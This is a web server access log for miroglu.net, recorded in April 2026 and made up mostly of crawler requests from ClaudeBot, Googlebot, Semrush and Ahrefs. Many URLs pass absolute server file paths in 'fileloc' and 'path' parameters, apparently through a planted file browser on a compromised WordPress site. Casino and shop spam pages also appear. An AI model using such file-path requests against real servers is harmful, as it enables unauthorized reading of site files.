216.73.217.81 - - [28/Apr/2026:07:43:59 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-comments-form%2Fblock.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-comments-form HTTP/2" 200 3293 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:43:58 +0300] "GET /14474-2/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Fsrc%2FCompat.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Fsrc HTTP/2" 200 21006 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:43:59 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fsite-title%2Feditor.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fsite-title HTTP/2" 200 2922 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:43:59 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-comments-form%2Fstyle.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-comments-form HTTP/2" 200 3262 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
47.82.9.39 - - [28/Apr/2026:07:43:59 +0300] "GET /11419-2/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-admin/css/css HTTP/1.1" 200 3761 "https://miroglu.net/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0"
216.73.217.81 - - [28/Apr/2026:07:43:59 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Fnamespaced%2FCrypto.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Fnamespaced HTTP/2" 200 2923 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:43:59 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fnavigation-link%2Feditor.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fnavigation-link HTTP/2" 200 3505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:43:59 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpullquote%2Fstyle-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpullquote HTTP/2" 200 3124 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:43:59 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpullquote%2Fstyle-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpullquote HTTP/2" 200 3142 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:43:59 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpullquote%2Feditor-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpullquote HTTP/2" 200 2956 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:00 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpullquote%2Feditor-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpullquote HTTP/2" 200 2959 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.191.171.15 - - [28/Apr/2026:07:44:00 +0300] "GET /index.php?shop%2Fincensed%2Fthyrsus052734829491.html HTTP/1.1" 200 10383 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.162 - - [28/Apr/2026:07:44:02 +0300] "GET /shop/centuplicating/saxicolidae211716526698.html HTTP/1.1" 200 28302 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.217.81 - - [28/Apr/2026:07:44:04 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ffootnotes%2Fstyle.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ffootnotes HTTP/2" 200 3013 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:04 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio%2Feditor.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio HTTP/2" 200 2962 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:04 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ffootnotes%2Fblock.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ffootnotes HTTP/2" 200 3092 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:04 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fnextpage%2Feditor.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fnextpage HTTP/2" 200 3183 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:04 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fsite-title%2Feditor-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fsite-title HTTP/2" 200 2921 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:04 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Fnamespaced%2FCompat.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Fnamespaced HTTP/2" 200 2924 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:04 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-content%2Fblock.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-content HTTP/2" 200 3271 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:04 +0300] "GET /14474-2/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Flib%2Fphp72compat.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Flib HTTP/2" 200 7293 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:04 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fsite-title%2Feditor-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fsite-title HTTP/2" 200 2925 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:04 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ffootnotes%2Fstyle.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ffootnotes HTTP/2" 200 3017 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:04 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio%2Feditor.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio HTTP/2" 200 2970 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:04 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fsite-title%2Fblock.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fsite-title HTTP/2" 200 3489 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:05 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fsite-title%2Fstyle.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fsite-title HTTP/2" 200 2881 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:05 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fheading%2Fblock.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fheading HTTP/2" 200 3501 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:05 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fheading%2Fstyle.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fheading HTTP/2" 200 2906 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:05 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fsite-title%2Fstyle.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fsite-title HTTP/2" 200 2880 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:05 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fheading%2Fstyle.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fheading HTTP/2" 200 2906 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:05 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fnavigation-link%2Fstyle-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fnavigation-link HTTP/2" 200 2947 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:05 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flatest-posts%2Feditor.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Flatest-posts HTTP/2" 200 3016 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.244.168.213 - - [28/Apr/2026:07:44:06 +0300] "GET /detail/802056941 HTTP/2" 200 8231 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.164 - - [28/Apr/2026:07:44:09 +0300] "GET /shop/retroactively/fungia21641973366.html HTTP/1.1" 200 28778 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
185.191.171.14 - - [28/Apr/2026:07:44:12 +0300] "GET /index.php?shop%2Fpropriety%2Fpettifogulize052612351022.html HTTP/1.1" 200 10357 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.217.81 - - [28/Apr/2026:07:44:13 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-author%2Fblock.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-author HTTP/2" 200 3416 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:13 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Farchives%2Feditor.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Farchives HTTP/2" 200 2891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:13 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Favatar%2Feditor.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Favatar HTTP/2" 200 2932 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:13 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio%2Ftheme.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio HTTP/2" 200 2947 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:13 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fparagraph%2Feditor-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fparagraph HTTP/2" 200 2995 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:13 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fparagraph%2Fstyle.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fparagraph HTTP/2" 200 3097 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:13 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ftemplate-part%2Feditor.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ftemplate-part HTTP/2" 200 3189 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:13 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-author%2Fstyle.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-author HTTP/2" 200 2981 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:13 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fsite-title%2Fstyle-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fsite-title HTTP/2" 200 2884 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:13 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ffootnotes%2Fstyle-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ffootnotes HTTP/2" 200 3019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:14 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fheading%2Fstyle-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fheading HTTP/2" 200 2908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:13 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fmore%2Feditor.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fmore HTTP/2" 200 3208 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:14 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fnextpage%2Feditor.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fnextpage HTTP/2" 200 3156 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:14 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ftemplate-part%2Feditor.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Ftemplate-part HTTP/2" 200 3217 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:14 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fparagraph%2Fstyle.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fparagraph HTTP/2" 200 3101 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:14 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio%2Ftheme.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Faudio HTTP/2" 200 2950 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:44:14 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-author%2Fstyle.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fpost-author HTTP/2" 200 2990 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
